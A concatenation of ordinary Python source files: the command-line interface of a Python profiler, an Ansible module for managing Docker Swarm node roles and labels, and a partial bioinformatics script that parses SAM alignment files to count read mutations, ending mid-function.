communication between server and application. (default: %s)' % SignalNumber.name_of(BackgroundProfiler.signum) )) ]) # sub-commands def __profile__(filename, code, globals_, profiler_factory, pickle_protocol=remote.PICKLE_PROTOCOL, dump_filename=None, mono=False): frame = sys._getframe() profiler = profiler_factory(base_frame=frame, base_code=code) profiler.start() try: exec_(code, globals_) except BaseException: # don't profile print_exc(). profiler.stop() traceback.print_exc() else: profiler.stop() # discard this __profile__ function from the result. profiler.stats.discard_child(frame.f_code) if dump_filename is None: try: profiler.run_viewer(get_title(filename), mono=mono) except KeyboardInterrupt: pass else: profiler.dump(dump_filename, pickle_protocol) click.echo('To view statistics:') click.echo(' $ profiling view ', nl=False) click.secho(dump_filename, underline=True) class ProfilingCommand(click.Command): def collect_usage_pieces(self, ctx): """Prepend "[--]" before "[ARGV]...".""" pieces = super(ProfilingCommand, self).collect_usage_pieces(ctx) assert pieces[-1] == '[ARGV]...' 
pieces.insert(-1, 'SCRIPT') pieces.insert(-1, '[--]') return pieces @cli.command(cls=ProfilingCommand) @profiler_arguments @profiler_options @onetime_profiler_options @viewer_options def profile(script, argv, profiler_factory, pickle_protocol, dump_filename, mono): """Profile a Python script.""" filename, code, globals_ = script sys.argv[:] = [filename] + list(argv) __profile__(filename, code, globals_, profiler_factory, pickle_protocol=pickle_protocol, dump_filename=dump_filename, mono=mono) @cli.command('live-profile', aliases=['live'], cls=ProfilingCommand) @profiler_arguments @profiler_options @live_profiler_options @viewer_options def live_profile(script, argv, profiler_factory, interval, spawn, signum, pickle_protocol, mono): """Profile a Python script continuously.""" filename, code, globals_ = script sys.argv[:] = [filename] + list(argv) parent_sock, child_sock = socket.socketpair() stderr_r_fd, stderr_w_fd = os.pipe() pid = os.fork() if pid: # parent os.close(stderr_w_fd) viewer, loop = make_viewer(mono) # loop.screen._term_output_file = open(os.devnull, 'w') title = get_title(filename) client = ProfilingClient(viewer, loop.event_loop, parent_sock, title) client.start() try: loop.run() except KeyboardInterrupt: os.kill(pid, signal.SIGINT) except BaseException: # unexpected profiler error. os.kill(pid, signal.SIGTERM) raise finally: parent_sock.close() # get exit code of child. w_pid, status = os.waitpid(pid, os.WNOHANG) if w_pid == 0: os.kill(pid, signal.SIGTERM) exit_code = os.WEXITSTATUS(status) # print stderr of child. with os.fdopen(stderr_r_fd, 'r') as f: child_stderr = f.read() if child_stderr: sys.stdout.flush() sys.stderr.write(child_stderr) # exit with exit code of child. sys.exit(exit_code) else: # child os.close(stderr_r_fd) # mute stdin, stdout. devnull = os.open(os.devnull, os.O_RDWR) for f in [sys.stdin, sys.stdout]: os.dup2(devnull, f.fileno()) # redirect stderr to parent. os.dup2(stderr_w_fd, sys.stderr.fileno()) frame = sys._getframe() profiler = profiler_factory(base_frame=frame, base_code=code) profiler_trigger = BackgroundProfiler(profiler, signum) profiler_trigger.prepare() server_args = (interval, noop, pickle_protocol) server = SelectProfilingServer(None, profiler_trigger, *server_args) server.clients.add(child_sock) spawn(server.connected, child_sock) try: exec_(code, globals_) finally: os.close(stderr_w_fd) child_sock.shutdown(socket.SHUT_WR) @cli.command('remote-profile', aliases=['remote'], cls=ProfilingCommand) @profiler_arguments @profiler_options @live_profiler_options @click.option('-b', '--bind', 'endpoint', type=Endpoint(), default=config_default('endpoint', DEFAULT_ENDPOINT), help='IP endpoint to serve profiling results.') @click.option('-v', '--verbose', is_flag=True, help='Print profiling server logs.') def remote_profile(script, argv, profiler_factory, interval, spawn, signum, pickle_protocol, endpoint, verbose): """Launch a server to profile continuously. The default endpoint is 127.0.0.1:8912. """ filename, code, globals_ = script sys.argv[:] = [filename] + list(argv) # create listener. listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM) listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) listener.bind(endpoint) listener.listen(1) # be verbose or quiet. if verbose: log = lambda x: click.echo(click.style('> ', fg='cyan') + x) bound_addr = listener.getsockname() log('Listening on {0}:{1} for profiling...'.format(*bound_addr)) else: log = noop # start profiling server. 
frame = sys._getframe() profiler = profiler_factory(base_frame=frame, base_code=code) profiler_trigger = BackgroundProfiler(profiler, signum) profiler_trigger.prepare() server_args = (interval, log, pickle_protocol) server = SelectProfilingServer(listener, profiler_trigger, *server_args) spawn(server.serve_forever) # exec the script. try: exec_(code, globals_) except KeyboardInterrupt: pass @cli.command() @click.argument('src', type=ViewerSource(), default=config_default('endpoint', DEFAULT_ENDPOINT)) @viewer_options def view(src, mono): """Inspect statistics by TUI view.""" src_type, src_name = src title = get_title(src_name, src_type) viewer, loop = make_viewer(mono) if src_type == 'dump': time = datetime.fromtimestamp(os.path.getmtime(src_name)) with open(src_name, 'rb') as f: profiler_class, (stats, cpu_time, wall_time) = pickle.load(f) viewer.set_profiler_class(profiler_class) viewer.set_result(stats, cpu_time, wall_time, title=title, at=time) viewer.activate() elif src_type in ('tcp', 'sock'): family = {'tcp': socket.AF_INET, 'sock': socket.AF_UNIX}[src_type] client = FailoverProfilingClient(viewer, loop.event_loop, src_name, family, title=title) client.start() try: loop.run() except KeyboardInterrupt: pass @cli.command('timeit-profile', aliases=['timeit']) @click.argument('stmt', metavar='STATEMENT', default='pass') @click.option('-n', '--number', type=int, help='How many times to execute the statement.') @click.option('-r', '--repeat', type=int, default=3, help='How many times to repeat the timer.') @click.option('-s', '--setup', default='pass', help='Statement to be executed once initially.') @click.option('-t', '--time', help='Ignored.') @click.option('-c', '--clock', help='Ignored.') @click.option('-v', '--verbose', help='Ignored.') @profiler_options @onetime_profiler_options @viewer_options def timeit_profile(stmt, number, repeat, setup, profiler_factory, pickle_protocol, dump_filename, mono, **_ignored): """Profile a Python statement like timeit.""" del _ignored globals_ = {} exec_(setup, globals_) if number is None: # determine number so that 0.2 <= total time < 2.0 like timeit. dummy_profiler = profiler_factory() dummy_profiler.start() for x in range(1, 10): number = 10 ** x t = time.time() for y in range(number): exec_(stmt, globals_) if time.time() - t >= 0.2: break dummy_profiler.stop() del dummy_profiler code = compile('for _ in range(%d): %s' % (number, stmt), 'STATEMENT', 'exec') __profile__(stmt, code, globals_, profiler_factory, pickle_protocol=pickle_protocol, dump_filename=dump_filename, mono=mono) # Deprecated. main = cli if __name__ == '__main__': cli(prog_name='python -m profiling')
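# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the profiling package: config_default() and
# config_flag() above resolve CLI defaults from a "[profiling]" section of
# setup.cfg or .profiling and fall back to a hard-coded default when the option
# or section is missing. A minimal standalone version of that lookup, assuming
# Python 3's configparser (the module itself goes through six.moves) and the
# hypothetical name lookup_option:
from configparser import ConfigParser, NoOptionError, NoSectionError


def lookup_option(option, default=None, section='profiling',
                  filenames=('setup.cfg', '.profiling')):
    """Return a config option as a string, or `default` when it is not set."""
    config = ConfigParser()
    config.read(filenames)  # missing files are silently ignored
    try:
        return config.get(section, option)
    except (NoOptionError, NoSectionError):
        return default


# e.g. lookup_option('timer', 'basic') returns the value of "timer" under
# "[profiling]" in setup.cfg when present, otherwise 'basic'.
# ---------------------------------------------------------------------------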
#!/usr/bin/python # # (c) 2019 Piotr Wojciechowski <piotr@it-playground.pl> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: docker_node short_description: Manage Docker Swarm node version_added: "2.8" description: - Manages the Docker nodes via Swarm Manager. - This module allows to change the node's role, its availability, and to modify, add or remove node labels. options: hostname: description: - The hostname or ID of node as registered in Swarm. - If more than one node is registered using the same hostname the ID must be used, otherwise module will fail. type: str required: yes labels: description: - User-defined key/value metadata that will be assigned as node attribute. - Label operations in this module apply to the docker swarm node specified by I(hostname). Use M(docker_swarm) module to add/modify/remove swarm cluster labels. - The actual state of labels assigned to the node when module completes its work depends on I(labels_state) and I(labels_to_remove) parameters values. See description below. type: dict labels_state: description: - It defines the operation on the labels assigned to node and labels specified in I(labels) option. - Set to C(merge) to combine labels provided in I(labels) with those already assigned to the node. If no labels are assigned then it will add listed labels. For labels that are already assigned to the node, it will update their values. The labels not specified in I(labels) will remain unchanged. If I(labels) is empty then no changes will be made. - Set to C(replace) to replace all assigned labels with provided ones. If I(labels) is empty then all labels assigned to the node will be removed. type: str default: 'merge' choices: - merge - replace labels_to_remove: description: - List of labels that will be removed from the node configuration. The list has to contain only label names, not their values. - If the label provided on the list is not assigned to the node, the entry is ignored. - If the label is both on the I(labels_to_remove) and I(labels), then value provided in I(labels) remains assigned to the node. - If I(labels_state) is C(replace) and I(labels) is not provided or empty then all labels assigned to node are removed and I(labels_to_remove) is ignored. type: list elements: str availability: description: Node availability to assign. If not provided then node availability remains unchanged. choices: - active - pause - drain type: str role: description: Node role to assign. If not provided then node role remains unchanged. 
choices: - manager - worker type: str extends_documentation_fragment: - docker - docker.docker_py_1_documentation requirements: - "L(Docker SDK for Python,https://docker-py.readthedocs.io/en/stable/) >= 2.4.0" - Docker API >= 1.25 author: - Piotr Wojciechowski (@WojciechowskiPiotr) - Thierry Bouvet (@tbouvet) ''' EXAMPLES = ''' - name: Set node role docker_node: hostname: mynode role: manager - name: Set node availability docker_node: hostname: mynode availability: drain - name: Replace node labels with new labels docker_node: hostname: mynode labels: key: value labels_state: replace - name: Merge node labels and new labels docker_node: hostname: mynode labels: key: value - name: Remove all labels assigned to node docker_node: hostname: mynode labels_state: replace - name: Remove selected labels from the node docker_node: hostname: mynode labels_to_remove: - key1 - key2 ''' RETURN = ''' node: description: Information about node after 'update' operation returned: success type: dict ''' import traceback try: from docker.errors import DockerException, APIError except ImportError: # missing Docker SDK for Python handled in ansible.module_utils.docker.common pass from ansible.module_utils.docker.common import ( DockerBaseClass, RequestException, ) from ansible.module_utils._text import to_native from ansible.module_utils.docker.swarm import AnsibleDockerSwarmClient class TaskParameters(DockerBaseClass): def __init__(self, client): super(TaskParameters, self).__init__() # Spec self.name = None self.labels = None self.labels_state = None self.labels_to_remove = None # Node self.availability = None self.role = None for key, value in client.module.params.items(): setattr(self, key, value) class SwarmNodeManager(DockerBaseClass): def __init__(self, client, results): super(SwarmNodeManager, self).__init__() self.client = client self.results = results self.check_mode = self.client.check_mode self.client.fail_task_if_not_swarm_manager() self.parameters = TaskParameters(client) self.node_update() def node_update(self): if not (self.client.check_if_swarm_node(node_id=self.parameters.hostname)): self.client.fail("This node is not part of a swarm.") return if self.client.check_if_swarm_node_is_down(): self.client.fail("Can not update the node. 
The node is down.") try: node_info = self.client.inspect_node(node_id=self.parameters.hostname) except APIError as exc: self.client.fail("Failed to get node information for %s" % to_native(exc)) changed = False node_spec = dict( Availability=self.parameters.availability, Role=self.parameters.role, Labels=self.parameters.labels, ) if self.parameters.role is None: node_spec['Role'] = node_info['Spec']['Role'] else: if not node_info['Spec']['Role'] == self.parameters.role: node_spec['Role'] = self.parameters.role changed = True if self.parameters.availability is None: node_spec['Availability'] = node_info['Spec']['Availability'] else: if not node_info['Spec']['Availability'] == self.parameters.availability: node_info['Spec']['Availability'] = self.parameters.availability changed = True if self.parameters.labels_state == 'replace': if self.parameters.labels is None: node_spec['Labels'] = {} if node_info['Spec']['Labels']: changed = True else: if (node_info['Spec']['Labels'] or {}) != self.parameters.labels: node_spec['Labels'] = self.parameters.labels changed = True elif self.parameters.labels_state == 'merge': node_spec['Labels'] = dict(node_info['Spec']['Labels'] or {}) if self.parameters.labels is not None: for key, value in self.parameters.labels.items(): if node_spec['Labels'].get(key) != value: node_spec['Labels'][key] = value changed = True if self.parameters.labels_to_remove is not None: for key in self.parameters.labels_to_remove: if self.parameters.labels is not None: if not self.parameters.labels.get(key): if node_spec['Labels'].get(key): node_spec['Labels'].pop(key) changed = True else: self.client.module.warn( "Label '%s' listed both in 'labels' and 'labels_to_remove'. " "Keeping the assigned label value." % to_native(key)) else: if node_spec['Labels'].get(key): node_spec['Labels'].pop(key) changed = True if changed is True: if not self.check_mode: try: self.client.update_node(node_id=node_info['ID'], version=node_info['Version']['Index'], node_spec=node_spec) except APIError as exc: self.client.fail("Failed to update node : %s" % to_native(exc)) self.results['node'] = self.client.get_node_inspect(node_id=node_info['ID']) self.results['changed'] = changed else: self.results['node'] = node_info self.results['changed'] = changed def main(): argument_spec = dict( hostname=dict(type='str', required=True), labels=dict(type='dict'), labels_state=dict(type='str', default='merge', choices=['merge', 'replace']), labels_to_remove=dict(type='list', elements='str'), availability=dict(type='str', choices=['active', 'pause', 'drain']), role=dict(type='str', choices=['worker', 'manager']), ) client = AnsibleDockerSwarmClient( argument_spec=argument_spec, supports_check_mode=True, min_docker_version='2.4.0', min_docker_api_version='1.25', ) try: results = dict( changed=False, ) SwarmNodeManager(client, results) client.module.exit_json(**results) except DockerException as e: client.fail('An unexpected docker error occurred: {0}'.format(e), exception=traceback.format_exc()) except RequestException as e: client.fail('An unexpected requests error occurred when docker-py tried to talk to the docker daemon: {0}'.format(e), exception=traceback.format_exc()) if __name__ == '__main__': main()
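# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the Ansible module above: the label handling
# documented for labels/labels_state/labels_to_remove reduces to a pure dict
# computation. The helper below (hypothetical name resolve_labels) mirrors that
# documented behaviour without making any Docker API calls.
def resolve_labels(current, labels=None, labels_state='merge',
                   labels_to_remove=None):
    """Return the label dict that should end up on the node."""
    current = dict(current or {})
    if labels_state == 'replace':
        # 'replace' discards existing labels; an empty/missing 'labels'
        # therefore wipes every label from the node.
        result = dict(labels or {})
    else:
        # 'merge' keeps existing labels and adds/updates the provided ones.
        result = current
        for key, value in (labels or {}).items():
            result[key] = value
    for key in (labels_to_remove or []):
        # A key listed in both 'labels' and 'labels_to_remove' keeps the value
        # given in 'labels'; keys not assigned to the node are ignored.
        if key not in (labels or {}):
            result.pop(key, None)
    return result


# e.g. resolve_labels({'a': '1', 'b': '2'}, labels={'a': 'x'},
#                     labels_to_remove=['b']) -> {'a': 'x'}
# ---------------------------------------------------------------------------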
#Author: MKT #purpose: to parse bowtie output files (after they have been weighted based on multiple mappings with weight_repeats.py and convert to pickled python dictionary. This one hashes by the start position of the read so it will be fast to classify them into exons, introns, etc. with the annotation file. #version history: #created 9/?/09 #updated 1/26/10- changed it to hash by start with respect to strand and not the middle of the read. For - strand reads this means adding 34 to the start w.r.t the + strand for a 35 bp read. #4/1/10 Pavan: commented out superfluous print commands #5/26/10 Boris: adjusting antisense read position by 20 instead of 34, since the mapping only uses 21 bp, this needs to be changed if the mapping size is changed. If read sizes aren't constant, then OH BOY!!! Also, added M1killer chromosome #6/24/10 Boris: Corrected for bowtie vs genome indexing #6/23/2013 Boris: Removed arbitrary hard-coding chromosome names, and accounted for split reads (indels, splice junctions) #7/21/2015 Thomas: Cleaned up code a bit, in addition to the mapping positions of the read 5p ends, it now outputs in the same format 1) number of times each position was covered by a read, 2) number of times each position was mutated relatove to reference sequence strands= ['+','-'] import sys, cPickle as pickle, gzip, re, numpy, os import mod_settings, mod_utils import matplotlib.pyplot as plt plt.rcParams['pdf.fonttype'] = 42 #leaves most text as actual text in PDFs, not outlines from collections import defaultdict def createStrandDict(strands): """ """ d = {} for strand in strands: d[strand] = {} return d def pickleDict(d, fn, suffix): fn = fn.split('.') out_fn = ''.join([fn[0]+suffix+'.pkl']) with open(out_fn, 'w') as g: pickle.dump(d, g) def readGenomicCoverage(rel_cov, strand, read_start): """ Assumes: rel_cov, a list relating position in read (i) to relative genomic postion rel_cov[i] strand, the mapping strand of the read read_start, the starting genomic position of the read Returns: pos_l, a list relating position in read (i) to absolute genomic position pos_l[i] """ if strand == '+': pos_l = [p+read_start for p in rel_cov] elif strand == '-': pos_l = [read_start-p for p in rel_cov] return pos_l def parse_MDz_and_cigar(cigarString, MDzString, mappingLength, seq): """ Assumes: cigarString - a string of [#][A-Z][#][A-Z] etc... that described the alignment of a read to the genome MDzString, the MD:z string for the current read genome_cov, a list relating position in read (i) to absolute genomic position pos_l[i] seq, a string representation of the read Returns: A list of positions with mismatches in absolute genomic position the genomic distance spanned by this read CIGAR STRING: M 0 alignment match (can be a sequence match or mismatch) I 1 insertion to the reference D 2 deletion from the reference N 3 skipped region from the reference S 4 soft clipping (clipped sequences present in SEQ) H 5 hard clipping (clipped sequences NOT present in SEQ) P 6 padding (silent deletion from padded reference) = 7 sequence match X 8 sequence mismatch H can only be present as the rst and/or last operation. S may only have H operations between them and the ends of the CIGAR string. For mRNA-to-genome alignment, an N operation represents an intron. For other types of alignments, the interpretation of N is not de ned. 4 Sum of lengths of the M/I/S/=/X operations shall equal the length of SEQ. 
""" #Parse cigar strings into numbers & tags numbers = re.split('[A-Z,=]', cigarString)[:-1] #not sure why, but this seems to produce an extra blank entry thay I'm stripping off tags = re.split('[0-9]*', cigarString)[1:] numbers = [int(n) for n in numbers] assert len(numbers) == len(tags) genomeMulitpliers = {'M':1, 'I':0, 'D':1, 'N':1, '=':1, 'X':1} readMulitpliers = {'M':1, 'I':1, 'D':0, 'N':0, '=':1, 'X':1} # Initialize counters readMappingSpan, genomeMappingSpan, genome_pos = 0, 0, 0 genomeCoverage = [] #print 'New Read' insertions = {}# need to know insertion positions and sizes in read for later parsing cigar_tups = zip(tags, numbers) for cigar in cigar_tups: tag, tag_len = cigar if tag == 'I': insertions[readMappingSpan] = tag_len genome_multiplier = genomeMulitpliers[tag] read_multiplier = readMulitpliers[tag] readMappingSpan += read_multiplier*tag_len genomeMappingSpan += genome_multiplier*tag_len # Determines which genomic positions relative to the read 5' end are covered by a read # For M, =, X: positions covered by read: so add to list, and increment counter # For D (deletion) and N (skipped region, similar to deletion, meant for introns): positions covered by read: # so add to list, and increment counter, so the length of the array # can be longer than the length of the read, but it should match the genome mapping span # I include N, since for my application of mapping to rRNA, anything defined as N should be an RT deletion that # I consider spanned by the read. If there are true intronic reads, then the counter ought be incremented without # adding to the array. #if genome_multiplier: # Increment counter if genome multiplier = 1, ie position spanned by read # if tag in 'M=XDN': # genomeCoverage += range(genome_pos,genome_pos+tag_len) # genome_pos += tag_len assert readMappingSpan == mappingLength #assert genomeMappingSpan == len(genomeCoverage) genomeCoverage = range(genomeMappingSpan) """ test all cases at: http://davetang.org/muse/2011/01/28/perl-and-sam/ The MD field aims to achieve SNP/indel calling without looking at the reference. For example, a string `10A5^AC6' means from the leftmost reference base in the alignment, there are 10 matches followed by an A on the reference which is different from the aligned read base; the next 5 reference bases are matches followed by a 2bp deletion from the reference; the deleted sequence is AC; the last 6 bases are matches. The MD field ought to match the CIGAR string. The string '0T0C37T' indicates the first base of the read is a mismatch from the reference sequence of T, the second base is a mismatch from the reference sequence C, followed by 37 matches, with a final mismatch from the reference A Boris 20151116 - this is getting an overhaul to deal with indels tags THomas's `10A5^AC6' example above should identify a mismatch at position 10 (zero-indexed), a deletion of length 2 at position 16 all indels will be assigned to the 3' end of the event. 
Only deletions will be used for the final count """ MDz = MDzString.split(':')[2] MD_tags = re.findall('[0-9]+|[A-Z,^]+',MDz) MD_tags = [int(x) if re.match('[0-9]+',x) else x for x in MD_tags] mutations_rel_read = ['M']*readMappingSpan #will keep track of mutations along the read, first nuc of read is position 0 mutations_rel_genome = ['M']*genomeMappingSpan #will keep track of mutations along the genome, first nuc of read is position 0 genomic_event_positions = [] # A list to store positions of mismatches read_counter = 0 # A counter to store the current position of the read (0 indexed) genome_counter = 0 # A counter to store the current position along the genome (0 indexed with respect to read start) for tag in MD_tags: #insertion relative to genome? if read_counter in insertions: assert insertions[read_counter] != 0 insertion_size = insertions[read_counter] read_counter += insertions[read_counter] assert mutations_rel_read[read_counter-1] =='M' mutations_rel_read[read_counter-1] = ('I', insertion_size) if tag in ['A','T','C','G']: #If the tag is a base it indicates a mismatch if seq[read_counter] != 'N': # We want to ignore 'N' bases in sequence assert mutations_rel_read[read_counter] =='M' assert mutations_rel_genome[genome_counter] =='M' mutations_rel_read[read_counter] = (tag, seq[read_counter]) mutations_rel_genome[genome_counter] = (tag, seq[read_counter]) genomic_event_positions.append(read_counter) # Append the current position in the read read_counter += 1 #Increment the counter genome_counter += 1 elif isinstance(tag, int): # If the tag is an int, this represents matches genome_counter += tag read_counter += tag # Increment counter by number of matches elif tag.startswith('^'):#the read contains a deletion relative to the genome deletion_length = len(tag)-1 genome_counter += deletion_length assert mutations_rel_genome[genome_counter-1] =='M' mutations_rel_genome[genome_counter-1] = ('D', deletion_length) genomic_event_positions.append(genome_counter-1) #print mutations_rel_read #print mutations_rel_genome #print read_counter, genome_counter #print genomeCoverage return genomic_event_positions, genomeCoverage, mutations_rel_genome, mutations_rel_read, readMappingSpan, genomeMappingSpan def checkTag(tag, fields): """ Assumes: tag, a str specifying a SAMtools tag fields, a SAMfile line in list format Does: Determines if the tag is at the expected index, if not, searches for the tag in fields Returns: fields[i], containing the tag """ tag_fields = [field for field in fields[7:] if tag in field] if len(tag_fields) == 0:#uh oh, no tag found if tag == 'NH:i:': #my alignments seem to lack this tag return 'NH:i:1' return tag_fields[0] def pie_read_5p_ends(read_5p_ends, genome_dict, out_prefix): fig = plt.figure(figsize=(8,17)) plot = fig.add_subplot(211) nuc_counts = defaultdict(int) for chromosome in read_5p_ends['+']: for position in read_5p_ends['+'][chromosome]: if position-1 > 0 : nuc = genome_dict[chromosome][position-1] nuc_counts[nuc] += read_5p_ends['+'][chromosome][position] labels = sorted(nuc_counts.keys()) sizes = [nuc_counts[nt] for nt in labels] plot.pie(sizes, labels = labels, colors = mod_utils.rainbow) plot.set_title('nt exactly at read 5p ends across rRNA') plot = fig.add_subplot(212) nuc_counts = defaultdict(int) for chromosome in read_5p_ends['+']: for position in read_5p_ends['+'][chromosome]: if position-2 > 0 : nuc = genome_dict[chromosome][position-2] nuc_counts[nuc] += read_5p_ends['+'][chromosome][position] labels = sorted(nuc_counts.keys()) sizes = 
[nuc_counts[nt] for nt in labels] plot.pie(sizes, labels = labels, colors = mod_utils.rainbow) plot.set_title('1nt upstream of read 5p ends across rRNA') plt.savefig(out_prefix + '_nt_5p_ends_pie.pdf', transparent='True', format='pdf') plt.clf() def plot_mutated_nts_pie(mutated_nts_count, title, out_prefix): fig = plt.figure(figsize=(8,8)) plot = fig.add_subplot(111)#first a pie chart of mutated nts labels = sorted(mutated_nts_count.keys()) sizes = [mutated_nts_count[nt] for nt in labels] total = float(sum(sizes)) merged_labels = ['%s %.3f' % (labels[i], sizes[i]/total) for i in range(len(sizes))] plot.pie(sizes, labels = merged_labels, colors = mod_utils.rainbow) plot.set_title(title) plt.savefig(out_prefix + '.pdf', transparent='True', format='pdf') plt.clf() def plot_full_mutation_stats(mutations_counts, indel_distribution, mutations_by_position, positional_coverage, title, x_label, out_prefix): fig = plt.figure(figsize=(16,16)) fig.suptitle(title) plot = fig.add_subplot(221)#first a pie chart of mutated nts labels = sorted(mutations_counts.keys()) sizes = [mutations_counts[nt] for nt in labels] plot.pie(sizes, labels = labels, colors = mod_utils.rainbow) plot = fig.add_subplot(222)#second a histogram of indel sizes bins = range(1, 20) bins.append(100) plot.hist(indel_distribution, color = mod_utils.black, bins = bins) plot.set_xlim(0,10) plot.set_xticks(numpy.arange(0,10)+0.5) plot.set_xticklabels(numpy.arange(0,10)) plot.set_xlabel(x_label) plot.set_ylabel("# events") bar_width = 0.5 all_events = sorted(mutations_counts, key=mutations_counts.get, reverse=True) top_events = all_events[:len(mod_utils.rainbow)] mut_positions = sorted(mutations_by_position.keys()) cov_positions = sorted(positional_coverage.keys()) plot = fig.add_subplot(223)#a stacked bar graph of positional mutation rates bottoms = [0]*len(mut_positions) bottoms = numpy.array(bottoms) plot_layers = [] color_index = 0 for event in top_events: event_amounts = [mutations_by_position[position][event] if event in mutations_by_position[position] else 0 for position in mut_positions] plot_layers.append(plot.bar(mut_positions, event_amounts, bar_width, bottom = bottoms, color = mod_utils.rainbow[color_index%len(mod_utils.rainbow)], label=event, lw = 0)) color_index += 1 bottoms = bottoms + numpy.array(event_amounts) plot.set_ylabel("mutation counts") plot.set_xlabel("read position") plot.set_xticks(numpy.array(mut_positions)[::5]+bar_width/2.0) plot.set_xticklabels(mut_positions[::5]) plot = fig.add_subplot(224)#a stacked bar graph of positional mutation rates normalized to coverage bottoms = [0]*len(mut_positions) bottoms = numpy.array(bottoms) plot_layers = [] color_index = 0 for event in top_events: event_amounts = [mutations_by_position[position][event]/positional_coverage[position] if (event in mutations_by_position[position] and positional_coverage[position]>100) else 0 for position in mut_positions] plot_layers.append(plot.bar(mut_positions, event_amounts, bar_width, bottom = bottoms, color = mod_utils.rainbow[color_index%len(mod_utils.rainbow)], label=event, lw = 0)) color_index += 1 bottoms = bottoms + numpy.array(event_amounts) plot.set_ylabel("mutation counts/coverage") plot.set_ylim(0,.02) plot.set_xlabel("read position") plot.set_xticks(numpy.array(mut_positions)[::5]+bar_width/2.0) plot.set_xticklabels(mut_positions[::5]) lg=plt.legend(loc=2,prop={'size':10}, labelspacing=0.2) lg.draw_frame(False) plt.savefig(out_prefix + '.pdf', transparent='True', format='pdf') plt.clf() def 
normed_mutation_rate_histogram(normalized_mutations, title, output_prefix): mutation_densities = [] for strand in normalized_mutations: for chromosome in normalized_mutations[strand]: mutation_densities = mutation_densities + normalized_mutations[strand][chromosome].values() fig = plt.figure(figsize=(16,16)) plot = fig.add_subplot(111) step = 0.0001 max = 0.01 bins = numpy.arange(0,max,step) bins = numpy.append(bins, 1+step) plot.hist(mutation_densities, color = mod_utils.black, bins = bins) plot.set_xlim(0,max+step) #plot.set_xticks(numpy.arange(0,10)+0.5) #plot.set_xticklabels(numpy.arange(0,10)) plot.set_xlabel('mutations/coverage') plot.set_ylabel("# positions") #plot.set_yscale('log') plot.set_title(title) plt.savefig(output_prefix + '_mut_density.pdf', transparent='True', format='pdf') plt.clf() def normalized_mutation_rates(mutation_counts, coverage_counts): normalized_mutations = {} for strand in mutation_counts: if not strand in normalized_mutations: normalized_mutations[strand] = {} for chromosome in mutation_counts[strand]: if not chromosome in normalized_mutations[strand]: normalized_mutations[strand][chromosome] = {} for position in mutation_counts[strand][chromosome]: if float(coverage_counts[strand][chromosome][position])>0: normalized_mutations[strand][chromosome][position] = \ float(mutation_counts[strand][chromosome][position])/float(coverage_counts[strand][chromosome][position]) return normalized_mutations def count_reads(lib_settings): """ """ # Create empty dicts for storing counts data srt_dict = createStrandDict(strands) # Counts for 5' end of read our standard data format cov_dict = createStrandDict(strands) # Counts of times covered by a read mut_dict = createStrandDict(strands) # Counts of mismatches at a position read_mutations = defaultdict(int) #counts different types of mutations relative to read genome_mutations = defaultdict(int) #counts different types of mutations relative to genome mutations_by_read_position = defaultdict(dict) read_position_coverage = defaultdict(float) mutations_by_genome_position = defaultdict(dict) genome_position_coverage = defaultdict(float) mutated_nts = defaultdict(float) read_insertion_sizes = [] genomic_deletion_sizes = [] with gzip.open(lib_settings.get_mapped_reads_sam_gz(), 'r') as f: for line in f: # Iterate through SAM file lines if not line.startswith('@'): # Parse line into relevant strings fields = line.strip().split('\t') ID = fields[0] #the first field in the mapped file corresponds to a unique id number for that read- these should correspond to the names in the raw_seqs dictionary flag = int(fields[1]) ''' The flag field provides a lot of info about the read, it is the decimal representation of a bit string, each digit of which is true or false Bit 0 = The read was part of a pair during sequencing Bit 1 = The read is mapped in a pair Bit 2 = The query sequence is unmapped Bit 3 = The mate is unmapped Bit 4 = Strand of query (0=forward 1=reverse) So, to see if a flag represents a read on the - strand, we evaluate (16 & 'flag'), where & is the bitwise and operator, which will be non-zero (True) only if this read is on the - strand ''' if (4&flag):#if this is an unmapped read, don't bother continue if (16&flag): strand = '-' else: strand = '+' chrom = fields[2] MAPQ = int(fields[4]) if int(MAPQ) >= lib_settings.get_property('min_mapping_quality'): cigarString = fields[5] seq = fields[9] mappingLength = len(seq) qScores = fields[10] # Some lines seem to lack some strings this throws of indexing of NM:i, MD:Z, and NH:i 
strings NHstr = checkTag('NH:i:',fields) NMstr = checkTag('NM:i:',fields) MDstr = checkTag('MD:Z:',fields) assert 'NM:i' in NMstr assert 'MD:Z' in MDstr assert 'NH:i' in NHstr multiplicity = float(NHstr.split(':')[2]) fields = line.strip().split('\t') counts = float(1.0/multiplicity) # Weight of read MDzString = MDstr # Add subdicts for chromosome if needed if chrom not in srt_dict[strand]: srt_dict[strand][chrom] = defaultdict(float) if chrom not in cov_dict[strand]: cov_dict[strand][chrom] = defaultdict(float) if chrom not in mut_dict[strand]: mut_dict[strand][chrom] = defaultdict(float) # Parse cigar string, get genome mapping span, and relative genomic positions covered by read rel_genomic_event_positions, rel_genome_coverage, mutations_rel_genome, mutations_rel_read, readMappingSpan, genomeMappingSpan = parse_MDz_and_cigar(cigarString, MDzString, mappingLength, seq) for pos in range(len(mutations_rel_genome)): genome_position_coverage[pos] += counts event = mutations_rel_genome[pos] if not event == 'M': #count if it's not a match assert event[0] != 'I' if event[0] == 'D': genomic_deletion_sizes.append(event[1]) event = event[0] if event not in mutations_by_genome_position[pos]: mutations_by_genome_position[pos][event] = 0 mutations_by_genome_position[pos][event] += counts genome_mutations[event] += counts if event[0] in 'ATCG': mutated_nts[event[0]] += counts for pos in range(len(mutations_rel_read)): read_position_coverage[pos] += counts event = mutations_rel_read[pos] if not event == 'M': #count if it's not a match assert event[0] != 'D' if event[0] == 'I': read_insertion_sizes.append(event[1]) event = event[0] if event not in mutations_by_read_position[pos]: mutations_by_read_position[pos][event] = 0 mutations_by_read_position[pos][event] += counts read_mutations[event] += counts # Set start position of read if strand== '+': start=int(fields[3]) else: #When a read maps to the minus strand, bowtie returns the reverse complement, and indicates # where this reverse mapped on the + strand. 
